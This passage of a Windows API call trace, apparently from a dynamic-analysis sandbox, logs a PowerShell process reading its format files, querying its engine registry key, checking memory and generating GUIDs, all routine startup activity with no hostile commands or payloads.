	[0062.543] VirtualQuery (in: lpAddress=0xad130, lpBuffer=0xae130, dwLength=0x1c | out: lpBuffer=0xae130*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.543] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xe60310cb, Data2=0xae92, Data3=0x44dd, Data4=([0]=0xa8, [1]=0xe3, [2]=0x31, [3]=0x21, [4]=0xf7, [5]=0xf6, [6]=0x82, [7]=0x56))) returned 0x0
	[0062.544] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x926a8a5, Data2=0xe8f0, Data3=0x4e6a, Data4=([0]=0x9d, [1]=0x8d, [2]=0x31, [3]=0x2a, [4]=0x8f, [5]=0x94, [6]=0xe, [7]=0x29))) returned 0x0
	[0062.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae17c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0062.544] GetLastError () returned 0x57
	[0062.544] SetErrorMode (uMode=0x1) returned 0x1
	[0062.544] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0062.544] GetLastError () returned 0x0
	[0062.545] GetFileType (hFile=0x2fc) returned 0x1
	[0062.545] SetErrorMode (uMode=0x1) returned 0x1
	[0062.545] GetFileType (hFile=0x2fc) returned 0x1
	[0062.545] ReadFile (in: hFile=0x2fc, lpBuffer=0x2368d04, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2368d04*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.546] GetLastError () returned 0x0
	[0062.547] ReadFile (in: hFile=0x2fc, lpBuffer=0x2368d04, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2368d04*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.547] GetLastError () returned 0x0
	[0062.548] ReadFile (in: hFile=0x2fc, lpBuffer=0x2368d04, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2368d04*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.548] GetLastError () returned 0x0
	[0062.548] ReadFile (in: hFile=0x2fc, lpBuffer=0x2368d04, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2368d04*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.548] GetLastError () returned 0x0
	[0062.549] ReadFile (in: hFile=0x2fc, lpBuffer=0x2368d04, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2368d04*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.549] GetLastError () returned 0x0
	[0062.550] ReadFile (in: hFile=0x2fc, lpBuffer=0x2368d04, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2368d04*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.550] GetLastError () returned 0x0
	[0062.550] ReadFile (in: hFile=0x2fc, lpBuffer=0x2368d04, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2368d04*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.550] GetLastError () returned 0x0
	[0062.550] ReadFile (in: hFile=0x2fc, lpBuffer=0x2368d04, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2368d04*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.550] GetLastError () returned 0x0
	[0062.552] ReadFile (in: hFile=0x2fc, lpBuffer=0x2368d04, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2368d04*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.552] GetLastError () returned 0x0
	[0062.552] ReadFile (in: hFile=0x2fc, lpBuffer=0x2368d04, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2368d04*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.552] GetLastError () returned 0x0
	[0062.552] ReadFile (in: hFile=0x2fc, lpBuffer=0x2368d04, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2368d04*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.552] GetLastError () returned 0x0
	[0062.553] ReadFile (in: hFile=0x2fc, lpBuffer=0x2368d04, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2368d04*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.553] GetLastError () returned 0x0
	[0062.553] ReadFile (in: hFile=0x2fc, lpBuffer=0x2368d04, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2368d04*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.553] GetLastError () returned 0x0
	[0062.553] ReadFile (in: hFile=0x2fc, lpBuffer=0x2368d04, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2368d04*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.553] GetLastError () returned 0x0
	[0062.554] ReadFile (in: hFile=0x2fc, lpBuffer=0x2368d04, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2368d04*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.554] GetLastError () returned 0x0
	[0062.554] ReadFile (in: hFile=0x2fc, lpBuffer=0x2368d04, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2368d04*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.554] GetLastError () returned 0x0
	[0062.569] ReadFile (in: hFile=0x2fc, lpBuffer=0x2368d04, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2368d04*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.569] GetLastError () returned 0x0
	[0062.570] ReadFile (in: hFile=0x2fc, lpBuffer=0x2368d04, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2368d04*, lpNumberOfBytesRead=0xae6e4*=0xbce, lpOverlapped=0x0) returned 1
	[0062.570] GetLastError () returned 0x0
	[0062.570] ReadFile (in: hFile=0x2fc, lpBuffer=0x2368472, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2368472*, lpNumberOfBytesRead=0xae6e4*=0x0, lpOverlapped=0x0) returned 1
	[0062.570] GetLastError () returned 0x0
	[0062.570] ReadFile (in: hFile=0x2fc, lpBuffer=0x2368d04, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2368d04*, lpNumberOfBytesRead=0xae6e4*=0x0, lpOverlapped=0x0) returned 1
	[0062.570] GetLastError () returned 0x0
	[0062.570] CloseHandle (hObject=0x2fc) returned 1
	[0062.570] GetLastError () returned 0x0
	[0062.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae244, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0062.570] GetLastError () returned 0x0
	[0062.570] SetErrorMode (uMode=0x1) returned 0x1
	[0062.571] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2389d00 | out: lpFileInformation=0x2389d00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0062.571] GetLastError () returned 0x0
	[0062.571] SetErrorMode (uMode=0x1) returned 0x1
	[0062.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0062.571] GetLastError () returned 0x0
	[0062.571] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae668 | out: phkResult=0xae668*=0x2fc) returned 0x0
	[0062.571] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae6b0, lpData=0x0, lpcbData=0xae6ac*=0x0 | out: lpType=0xae6b0*=0x1, lpData=0x0, lpcbData=0xae6ac*=0x56) returned 0x0
	[0062.571] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae6b0, lpData=0x242ad0, lpcbData=0xae6ac*=0x56 | out: lpType=0xae6b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xae6ac*=0x56) returned 0x0
	[0062.572] RegCloseKey (hKey=0x2fc) returned 0x0
	[0062.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0062.572] GetLastError () returned 0x0
	[0062.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0062.572] GetLastError () returned 0x0
	[0062.577] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x3a1b77b3, Data2=0x1fc, Data3=0x4ec9, Data4=([0]=0x94, [1]=0x76, [2]=0x3e, [3]=0xe6, [4]=0xa1, [5]=0x39, [6]=0xa6, [7]=0xe4))) returned 0x0
	[0062.577] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xd78d8df3, Data2=0x995e, Data3=0x4083, Data4=([0]=0x97, [1]=0xc, [2]=0xb0, [3]=0x86, [4]=0x20, [5]=0x79, [6]=0xf8, [7]=0x55))) returned 0x0
	[0062.578] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x7e2afd0d, Data2=0xa8c8, Data3=0x4c6e, Data4=([0]=0xaf, [1]=0x4e, [2]=0x39, [3]=0xc5, [4]=0xaf, [5]=0xce, [6]=0x60, [7]=0xe2))) returned 0x0
	[0062.578] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x87b66417, Data2=0xd4c8, Data3=0x419a, Data4=([0]=0xa3, [1]=0x6f, [2]=0xe6, [3]=0xb6, [4]=0x43, [5]=0x0, [6]=0x48, [7]=0xd))) returned 0x0
	[0062.578] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x5850dae6, Data2=0x3064, Data3=0x4439, Data4=([0]=0x82, [1]=0x14, [2]=0xe2, [3]=0x60, [4]=0xc9, [5]=0xc5, [6]=0x26, [7]=0xb3))) returned 0x0
	[0062.579] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x7f8277a4, Data2=0xb19a, Data3=0x4e1e, Data4=([0]=0x81, [1]=0x57, [2]=0x5a, [3]=0xc9, [4]=0x5b, [5]=0x67, [6]=0xaf, [7]=0x26))) returned 0x0
	[0062.579] VirtualQuery (in: lpAddress=0xad410, lpBuffer=0xae410, dwLength=0x1c | out: lpBuffer=0xae410*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.579] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x94305acd, Data2=0x6d30, Data3=0x46b8, Data4=([0]=0xb2, [1]=0x97, [2]=0x72, [3]=0x32, [4]=0xc2, [5]=0xed, [6]=0xcb, [7]=0x3d))) returned 0x0
	[0062.580] VirtualQuery (in: lpAddress=0xad410, lpBuffer=0xae410, dwLength=0x1c | out: lpBuffer=0xae410*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.580] VirtualQuery (in: lpAddress=0xad410, lpBuffer=0xae410, dwLength=0x1c | out: lpBuffer=0xae410*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.580] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x48b338d9, Data2=0x3dc6, Data3=0x4f47, Data4=([0]=0x8f, [1]=0x40, [2]=0x30, [3]=0xf4, [4]=0xb5, [5]=0x9f, [6]=0x4f, [7]=0x94))) returned 0x0
	[0062.580] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x9f2698c9, Data2=0x5f06, Data3=0x4961, Data4=([0]=0xb9, [1]=0x34, [2]=0x4, [3]=0x56, [4]=0xdf, [5]=0x10, [6]=0x77, [7]=0x4d))) returned 0x0
	[0062.581] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xf479c82b, Data2=0xd23c, Data3=0x4e54, Data4=([0]=0x8f, [1]=0x8d, [2]=0x6d, [3]=0x22, [4]=0xb3, [5]=0x5e, [6]=0x5d, [7]=0xed))) returned 0x0
	[0062.581] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x51760e3d, Data2=0x2777, Data3=0x4f25, Data4=([0]=0xa0, [1]=0xdd, [2]=0x61, [3]=0xf7, [4]=0x61, [5]=0x9c, [6]=0x79, [7]=0x16))) returned 0x0
	[0062.581] VirtualQuery (in: lpAddress=0xad410, lpBuffer=0xae410, dwLength=0x1c | out: lpBuffer=0xae410*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.581] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x10e44a2, Data2=0x96c6, Data3=0x46a7, Data4=([0]=0xb9, [1]=0x6, [2]=0x1f, [3]=0xb2, [4]=0xe7, [5]=0x64, [6]=0x5f, [7]=0x77))) returned 0x0
	[0062.582] VirtualQuery (in: lpAddress=0xad410, lpBuffer=0xae410, dwLength=0x1c | out: lpBuffer=0xae410*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.582] VirtualQuery (in: lpAddress=0xad410, lpBuffer=0xae410, dwLength=0x1c | out: lpBuffer=0xae410*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.583] VirtualQuery (in: lpAddress=0xad410, lpBuffer=0xae410, dwLength=0x1c | out: lpBuffer=0xae410*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.583] VirtualQuery (in: lpAddress=0xad410, lpBuffer=0xae410, dwLength=0x1c | out: lpBuffer=0xae410*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.584] VirtualQuery (in: lpAddress=0xad410, lpBuffer=0xae410, dwLength=0x1c | out: lpBuffer=0xae410*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.584] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x396f7a3f, Data2=0x8b44, Data3=0x4485, Data4=([0]=0xa7, [1]=0x42, [2]=0x7b, [3]=0x60, [4]=0xe, [5]=0x5, [6]=0x6c, [7]=0x41))) returned 0x0
	[0062.585] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x8e1972cc, Data2=0xde31, Data3=0x4932, Data4=([0]=0xbe, [1]=0xed, [2]=0x74, [3]=0x1f, [4]=0x4f, [5]=0x48, [6]=0xe, [7]=0xf3))) returned 0x0
	[0062.585] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x8c8c8a34, Data2=0xbb5d, Data3=0x41a7, Data4=([0]=0xa4, [1]=0xa8, [2]=0xbf, [3]=0x55, [4]=0x57, [5]=0xd4, [6]=0x97, [7]=0xf7))) returned 0x0
	[0062.585] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x787bda8d, Data2=0xcdb, Data3=0x42bd, Data4=([0]=0xb3, [1]=0xc2, [2]=0x75, [3]=0x40, [4]=0xf2, [5]=0x36, [6]=0x9e, [7]=0xe2))) returned 0x0
	[0062.585] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x61bc8797, Data2=0x1008, Data3=0x4a3b, Data4=([0]=0xb2, [1]=0xe2, [2]=0xe4, [3]=0x2c, [4]=0x9f, [5]=0xb3, [6]=0x3c, [7]=0x58))) returned 0x0
	[0062.585] VirtualQuery (in: lpAddress=0xad564, lpBuffer=0xae564, dwLength=0x1c | out: lpBuffer=0xae564*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.586] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x96503b39, Data2=0x44b4, Data3=0x4e88, Data4=([0]=0xa9, [1]=0xb8, [2]=0x6f, [3]=0x26, [4]=0xc3, [5]=0xe7, [6]=0x3b, [7]=0x49))) returned 0x0
	[0062.586] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x19dfc1b8, Data2=0x7be6, Data3=0x4327, Data4=([0]=0x9a, [1]=0x31, [2]=0x66, [3]=0x77, [4]=0x71, [5]=0x8c, [6]=0xf, [7]=0xb0))) returned 0x0
	[0062.587] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x5fdc2858, Data2=0xad43, Data3=0x43e6, Data4=([0]=0x87, [1]=0xf, [2]=0x6b, [3]=0x58, [4]=0xf8, [5]=0x1d, [6]=0x40, [7]=0x22))) returned 0x0
	[0062.587] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x30962b4b, Data2=0xcc5, Data3=0x4a03, Data4=([0]=0x9f, [1]=0x58, [2]=0x4b, [3]=0x1c, [4]=0xd1, [5]=0x3e, [6]=0x14, [7]=0xf4))) returned 0x0
	[0062.587] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xd3e7c632, Data2=0x45a8, Data3=0x4e60, Data4=([0]=0xaf, [1]=0xa5, [2]=0xd3, [3]=0xd3, [4]=0x23, [5]=0x9, [6]=0xcd, [7]=0xfe))) returned 0x0
	[0062.587] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x68e40d78, Data2=0xb5c2, Data3=0x4009, Data4=([0]=0x90, [1]=0xc1, [2]=0x5, [3]=0x6c, [4]=0xf2, [5]=0xd0, [6]=0xf5, [7]=0x6b))) returned 0x0
	[0062.588] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x1426eb6a, Data2=0xdb56, Data3=0x4dc6, Data4=([0]=0xb3, [1]=0x55, [2]=0x20, [3]=0xd4, [4]=0x90, [5]=0x70, [6]=0x38, [7]=0x40))) returned 0x0
	[0062.588] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x10708934, Data2=0x687a, Data3=0x4a03, Data4=([0]=0x8f, [1]=0x86, [2]=0xd8, [3]=0x95, [4]=0xaa, [5]=0x98, [6]=0xcf, [7]=0xd))) returned 0x0
	[0062.589] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xa05661c7, Data2=0xa998, Data3=0x45ff, Data4=([0]=0xa3, [1]=0xe7, [2]=0xe6, [3]=0x78, [4]=0xbf, [5]=0xc9, [6]=0xf3, [7]=0x58))) returned 0x0
	[0062.589] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x32484c7, Data2=0xead, Data3=0x4641, Data4=([0]=0x81, [1]=0x1f, [2]=0x8a, [3]=0x4, [4]=0xb4, [5]=0x8a, [6]=0x5e, [7]=0xcb))) returned 0x0
	[0062.589] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xd0b6fea, Data2=0x3594, Data3=0x4ba9, Data4=([0]=0x83, [1]=0x9f, [2]=0x60, [3]=0x28, [4]=0xa0, [5]=0x37, [6]=0xc, [7]=0x6e))) returned 0x0
	[0062.589] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x4af4e544, Data2=0x8a93, Data3=0x4a3e, Data4=([0]=0x85, [1]=0x85, [2]=0xb2, [3]=0x8b, [4]=0xe0, [5]=0xa0, [6]=0x11, [7]=0x4d))) returned 0x0
	[0062.590] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xcae147ab, Data2=0x9157, Data3=0x454d, Data4=([0]=0x90, [1]=0xdf, [2]=0x80, [3]=0x77, [4]=0x53, [5]=0x56, [6]=0xa1, [7]=0xa1))) returned 0x0
	[0062.590] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x89724180, Data2=0xc0c2, Data3=0x4ad8, Data4=([0]=0x91, [1]=0x5f, [2]=0xfe, [3]=0xd0, [4]=0xe7, [5]=0xfe, [6]=0x7c, [7]=0x4a))) returned 0x0
	[0062.590] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x8d496276, Data2=0xae43, Data3=0x43eb, Data4=([0]=0x9d, [1]=0x6e, [2]=0x63, [3]=0x83, [4]=0xad, [5]=0x2c, [6]=0x29, [7]=0xa9))) returned 0x0
	[0062.590] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xff1dd400, Data2=0xa3f5, Data3=0x4f44, Data4=([0]=0x86, [1]=0xe3, [2]=0xd8, [3]=0x27, [4]=0xc, [5]=0xb, [6]=0x23, [7]=0x77))) returned 0x0
	[0062.590] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x5012b79f, Data2=0x8f6a, Data3=0x47da, Data4=([0]=0xb6, [1]=0x5a, [2]=0x6c, [3]=0x83, [4]=0x1c, [5]=0x8a, [6]=0xbf, [7]=0x68))) returned 0x0
	[0062.591] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xeaff3c74, Data2=0x678c, Data3=0x4196, Data4=([0]=0x90, [1]=0x1d, [2]=0xe9, [3]=0x7c, [4]=0x79, [5]=0x80, [6]=0x6, [7]=0x62))) returned 0x0
	[0062.591] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0xb34bcb94, Data2=0xfce0, Data3=0x4b8c, Data4=([0]=0xb5, [1]=0x1e, [2]=0x56, [3]=0x83, [4]=0x4, [5]=0x42, [6]=0xc7, [7]=0x33))) returned 0x0
	[0062.591] VirtualQuery (in: lpAddress=0xad410, lpBuffer=0xae410, dwLength=0x1c | out: lpBuffer=0xae410*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.591] VirtualQuery (in: lpAddress=0xad410, lpBuffer=0xae410, dwLength=0x1c | out: lpBuffer=0xae410*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.593] VirtualQuery (in: lpAddress=0xad410, lpBuffer=0xae410, dwLength=0x1c | out: lpBuffer=0xae410*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0062.594] CoCreateGuid (in: pguid=0xae6d8 | out: pguid=0xae6d8*(Data1=0x28173bdb, Data2=0x201e, Data3=0x486a, Data4=([0]=0x99, [1]=0x67, [2]=0xc0, [3]=0x72, [4]=0xc, [5]=0xf8, [6]=0x12, [7]=0x49))) returned 0x0
	[0062.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xae17c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0062.594] GetLastError () returned 0x0
	[0062.594] SetErrorMode (uMode=0x1) returned 0x1
	[0062.594] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0062.595] GetLastError () returned 0x0
	[0062.595] GetFileType (hFile=0x2fc) returned 0x1
	[0062.595] SetErrorMode (uMode=0x1) returned 0x1
	[0062.595] GetFileType (hFile=0x2fc) returned 0x1
	[0062.595] ReadFile (in: hFile=0x2fc, lpBuffer=0x2426bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2426bec*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.596] GetLastError () returned 0x0
	[0062.597] ReadFile (in: hFile=0x2fc, lpBuffer=0x2426bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2426bec*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.597] GetLastError () returned 0x0
	[0062.598] ReadFile (in: hFile=0x2fc, lpBuffer=0x2426bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae6e4, lpOverlapped=0x0 | out: lpBuffer=0x2426bec*, lpNumberOfBytesRead=0xae6e4*=0x1000, lpOverlapped=0x0) returned 1
	[0062.598] GetLastError () returned 0x0
